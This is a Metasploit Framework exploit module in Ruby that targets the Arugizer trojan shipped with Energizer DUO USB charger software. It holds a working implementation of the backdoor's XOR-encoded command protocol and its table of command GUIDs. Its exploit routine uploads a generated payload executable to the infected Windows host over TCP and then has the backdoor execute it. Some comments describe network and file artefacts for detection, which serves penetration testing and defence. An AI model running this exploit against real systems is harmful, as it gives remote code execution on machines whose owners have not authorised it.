GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/backdoor/energizer_duo_payload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the Arugizer backdoor (CVE-2010-0103) that shipped
# with the Energizer DUO USB charger software. There is no memory-corruption
# bug here: the module speaks the backdoor's own command protocol to write a
# generated payload EXE to the host and then ask the backdoor to run it.
# The framing and XOR scheme implemented below are therefore also the
# observable wire behaviour that a network detection rule can key on.
class MetasploitModule < Msf::Exploit::Remote
  # Metasploit reliability rank; the module only exchanges protocol frames.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # Module metadata. Beyond the options the TCP mixin provides, the module
  # registers only RPORT, defaulting to 7777 (the port it expects the
  # backdoor's listener on). The single 'Automatic' target has no
  # target-specific settings.
  #
  # @param info [Hash] module info merged by Metasploit via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution',
      'Description' => %q{
        This module will execute an arbitrary payload against
        any system infected with the Arugizer trojan horse. This
        backdoor was shipped with the software package accompanying
        the Energizer DUO USB battery charger.
      },
      'Author' => [ 'hdm' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2010-0103'],
          ['OSVDB', '62782'],
          ['US-CERT-VU', '154421']
        ],
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2010-03-05'
    ))

    register_options(
      [
        Opt::RPORT(7777),
      ])
  end

  # Obfuscates +str+ for the wire by XORing every byte with the constant 0xE5
  # and returns the result as a new binary string. XOR with a fixed byte is its
  # own inverse, so the same method also decodes anything received.
  #
  # This is obfuscation, not encryption: with a fixed single-byte key every
  # command GUID in trojan_command maps to one constant byte sequence on the
  # network, which is exactly what a traffic signature for this backdoor can
  # match on.
  #
  # @param str [String] bytes to encode (any encoding; processed byte-wise)
  # @return [String] XOR-encoded bytes
  def trojan_encode(str)
    str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
  end

  # Builds one encoded command frame for the backdoor.
  #
  # +cmd+ is one of the symbols in the case below and selects the GUID-formatted
  # command identifier the backdoor uses for that operation. The frame is a
  # little-endian 32-bit length (GUID length plus the terminating NUL), the
  # GUID text, and a NUL byte, all passed through trojan_encode. Only :write,
  # :exec and :nop are sent by #exploit; the remaining identifiers are kept as
  # a table of the protocol's other commands, named by their symbol only.
  #
  # NOTE(review): an unrecognised symbol falls through with +cid+ left empty,
  # so the method still returns a frame (length 1 followed by a lone NUL)
  # rather than raising; callers are expected to pass only the listed symbols.
  #
  # @param cmd [Symbol] command selector
  # @return [String] XOR-encoded command frame
  def trojan_command(cmd)
    cid = ""

    case cmd
    when :exec
      cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
    when :dir
      cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
    when :write
      cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
    when :read
      cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
    when :nop
      cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
    when :find
      cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
    when :yes
      cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
    when :runonce
      cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
    when :delete
      cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
    end

    # cid is plain ASCII, so String#length equals the byte count here.
    trojan_encode(
      [cid.length + 1].pack("V") + cid + "\x00"
    )
  end

  # Writes the generated payload EXE to the infected host and then asks the
  # backdoor to run it, using two separate TCP sessions to RPORT.
  #
  # Session 1: :write frame, then the NUL-terminated destination path and the
  # NUL-terminated EXE, each preceded by its length as a little-endian 32-bit
  # integer, every piece XOR-encoded. Session 2: :exec frame followed by the
  # same length-prefixed path. Each session ends with a :nop frame before
  # disconnecting, per the existing comments below.
  #
  # Artefacts a defender can look for: a new file C:\<12 alphanumeric
  # chars>.exe on the host and, if the exec request succeeds, a process started
  # from it; on the network, two short connections to RPORT carrying
  # 0xE5-XORed frames that begin with the constant encoded :write / :exec
  # GUIDs.
  def exploit

    # Destination path: random 12-character alphanumeric name directly under
    # C:\. Both the path and the EXE carry a trailing NUL, and the length
    # fields sent below use .length, so each length counts that terminator.
    # nam is ASCII, so its length is its byte count; exe's length is presumably
    # a byte count as well because generate_payload_exe returns raw EXE bytes —
    # confirm the returned string's encoding if this is ever revisited.
    nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
    exe = generate_payload_exe + "\x00"


    print_status("Trying to upload #{nam}...")
    connect

    # Write file request: command, then [len][path], then [len][contents].
    sock.put(trojan_command(:write))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))
    sock.put(trojan_encode([exe.length].pack("V")))
    sock.put(trojan_encode(exe))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect

    #
    # Execute the payload
    #

    print_status("Trying to execute #{nam}...")

    connect

    # Execute file request: command, then the same [len][path] as the write.
    sock.put(trojan_command(:exec))
    sock.put(trojan_encode([nam.length].pack("V")))
    sock.put(trojan_encode(nam))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect
  end
end